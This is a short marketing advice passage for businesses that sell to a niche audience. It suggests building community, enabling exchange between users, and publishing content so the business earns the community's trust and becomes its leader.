If you’re fortunate enough to sell to a very focused niche that is at best a highly active tribe or at worst a loose community, here are a few ways of how you can help them:
Facilitate communication. Allow for more connections between the people in your niche. Enable existing communities or build one yourself using community software like Circle.so or Tribe.so. Interview leaders in the community on your blog, giving them more reach and their voices more impact. Interview members of your community, showcasing both their uniqueness and their belonging to the tribe at the same time. Syndicate user-generated content on your blog. Turn regular tribe members into influencers through your outlets.
Facilitate exchange. From day one, envision your product to have a component where your users can share something. It can be data, insights, best practices, support, frankly anything. Give your users a chance to empower each other, and they will make sure to increase their impact radius by carrying your service to their peers. Offer free resources from inside the community, and share your content with other outlets in the niche.
Produce and syndicate valuable content. No matter if you’re producing a podcast, regular blog posts, a video series, or you write articles with ratings, reviews, and testimonials: as long as you provide helpful and meaningful content for your niche, you will have followers that spread it. As your content is written for your customers, any new reader will likely be an excellent candidate to become a new customer as well.
All of this generates trust. Trust is the currency of tribes, and with enough trust, people want to listen to you. You don’t need to spend money on marketing, and frankly, you couldn’t buy this kind of relationship with your customers if you wanted to.
Use the fact that you’re selling to a niche audience to your advantage and become a leader in your tribe. Help it grow, help your community members to learn and get ahead. This way, you’ll end up with a never-ending stream of eager customers who trust you and amplify your messages.